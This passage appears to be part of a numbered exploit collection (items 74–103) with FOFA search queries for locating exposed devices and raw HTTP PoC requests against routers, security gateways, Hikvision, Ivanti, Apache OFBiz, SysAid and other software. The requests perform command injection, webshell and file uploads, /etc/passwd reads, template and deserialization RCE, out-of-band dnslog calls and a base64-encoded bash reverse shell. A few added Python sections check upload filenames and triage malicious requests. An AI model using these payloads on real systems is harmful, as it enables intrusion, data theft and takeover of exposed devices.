User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Moz</thinking_mode>illa/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 888
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QAX) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin Legendsec (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload by fetching the file back (the filename is the one uploaded in this request, cciytdzu.txt):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the serialized payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated base64 into the <serializable> element of the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 ProgramExport Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

The base64 decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1 (the PoC author's listener); change the address and port to your own before re-encoding.
97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

URL-decoded, the body is {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the command is passed through the param array.


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


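Added example (not part of the original list and not code from any vendor named above): a Python script that rebuilds the multipart body of PoC 93 with correct CRLF framing, parses it back, and applies the server-side filename check that the upload handlers hit by PoCs 93, 94 and 100 are missing. The part values are copied from PoC 93; the extension allow-list, the executable-extension list and the function names are choices made for this example.

```python
import re

# Boundary and fields of PoC 93 above (constructed here from the request as printed).
BOUNDARY = "----WebKitFormBoundarykcbkgdfx"
POC93_PARTS = [
    # (field name, filename or None, content type or None, data)
    ("MAX_FILE_SIZE", None, None, b"10000000"),
    ("upfile", "xlskxknxa.txt", "text/plain", b"wagletqrkwrddkthtulxsqrphulnknxa"),
    ("submit_post", None, None, b"obj_app_upfile"),
    ("__hash__", None, None, b"0b9d6b1ab7479ab69d9f71b05e0e9445"),
]

# Assumed policy for the example: what an attachment/image upload endpoint should accept.
ALLOWED_UPLOAD_EXT = {".txt", ".png", ".jpg", ".jpeg", ".gif", ".pdf"}
EXECUTABLE_EXT = {".php", ".php3", ".php5", ".phtml", ".phar", ".jsp", ".jspx", ".asp", ".aspx"}

_NAME_RE = re.compile(r'(?<!file)name="([^"]*)"')
_FILENAME_RE = re.compile(r'filename="([^"]*)"')


def build_multipart(boundary, parts):
    """Serialise form parts with CRLF framing, as a browser or Burp would send them."""
    out = bytearray()
    for name, filename, ctype, data in parts:
        out += f"--{boundary}\r\n".encode()
        disposition = f'Content-Disposition: form-data; name="{name}"'
        if filename is not None:
            disposition += f'; filename="{filename}"'
        out += disposition.encode() + b"\r\n"
        if ctype is not None:
            out += f"Content-Type: {ctype}\r\n".encode()
        out += b"\r\n" + data + b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


def parse_multipart(body, boundary):
    """Minimal parser: split on the delimiter and return one dict per part."""
    delimiter = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        name = _NAME_RE.search(disposition)
        filename = _FILENAME_RE.search(disposition)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": filename.group(1) if filename else None,
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def is_safe_upload_name(filename):
    """Server-side filename check: no path components, no dotfiles (.htaccess),
    an extension from the allow-list, and no executable extension anywhere in
    the name (shell.php.png)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base != filename or base in ("", ".", ".."):
        return False
    pieces = base.lower().split(".")
    if len(pieces) < 2 or pieces[0] == "":
        return False
    if any("." + p in EXECUTABLE_EXT for p in pieces[1:]):
        return False
    return "." + pieces[-1] in ALLOWED_UPLOAD_EXT


def rejected_uploads(parts):
    """Filenames from parsed parts that the check above would refuse."""
    return [p["filename"] for p in parts
            if p["filename"] is not None and not is_safe_upload_name(p["filename"])]
```

The same parse-and-check pass over PoC 100's body flags IE4MGP.php, while PoC 93's .txt upload passes the filename check (that PoC abuses a missing authorization check, not the extension). When a PoC from this list is edited by hand, recompute Content-Length from len(build_multipart(...)) rather than trusting the printed value.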
101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


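Added example (not from the original post or from Ivanti): the request target of PoC 101 walks out of one API prefix with ../ and carries a percent-encoded ; into the last segment. The Python below decodes and normalizes the target the way a backend router would, reports when the literal path and the normalized path fall under different prefixes, and lists the segments that contain shell metacharacters. The PUBLIC_PREFIXES list is an assumption made for this example (the prefix the PoC enters through is treated as one that is reachable without authentication); the function names are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Request target from PoC 101 above.
PAGE_TARGET = "/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw"

# Assumption for this example: an API prefix that a front-end check lets through
# unauthenticated, judged on the literal (un-normalized) path.
PUBLIC_PREFIXES = ["/api/v1/totp/user-backup-code/"]

_SHELL_META = re.compile(r"[;|&`$()<>\n]")


def normalize_target(raw_target):
    """Percent-decode once and collapse '.'/'..' segments: the path the backend routes on."""
    return posixpath.normpath(unquote(urlsplit(raw_target).path))


def _under(path, prefix):
    prefix = prefix.rstrip("/")
    return path == prefix or path.startswith(prefix + "/")


def route_mismatch(raw_target, public_prefixes):
    """True when the literal path sits under a public prefix but the normalized path
    does not: a traversal used to reach an endpoint the front check never evaluated."""
    literal = urlsplit(raw_target).path
    normalized = normalize_target(raw_target)
    literal_public = any(_under(literal, p) for p in public_prefixes)
    normalized_public = any(_under(normalized, p) for p in public_prefixes)
    return literal_public and not normalized_public


def injected_segments(raw_target):
    """Path segments that contain shell metacharacters after decoding (';curl ...' here)."""
    return [seg for seg in normalize_target(raw_target).split("/") if _SHELL_META.search(seg)]


def triage_target(raw_target, public_prefixes=PUBLIC_PREFIXES):
    """One-call summary for a request line pulled from an access log or proxy capture."""
    return {
        "normalized": normalize_target(raw_target),
        "route_mismatch": route_mismatch(raw_target, public_prefixes),
        "injected": injected_segments(raw_target),
    }
```

Both signals are worth alerting on independently: a route mismatch indicates a traversal across API prefixes even when the final segment is clean, and a metacharacter in a decoded segment indicates injection even when no traversal is present. Normalize on the decoded form; searching raw logs for ../ misses %2e%2e and double-encoded variants.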
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

The outbound request goes to the ds:RetrievalMethod URI; point it at your own callback host. The signature value itself is junk and is never validated before the fetch.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML (the parameter entity forces an out-of-band fetch of the SYSTEM URL, which is what the dnslog host records):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


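Added example (not from the original post or from Ivanti): a Python triage routine for a captured saml-sso.cgi body such as the one in PoC 103. It extracts SAMLRequest, base64-decodes it (HTTP-POST binding, as in the PoC; the Redirect binding additionally deflates and is not handled here), reports whether a DTD is present and which external entity URLs it declares, and shows the hardened parse that refuses any document carrying a DTD. The function names are hypothetical; the decoded XML is the one the PoC shows.

```python
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# The POST body of PoC 103 above.
PAGE_BODY = "SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="

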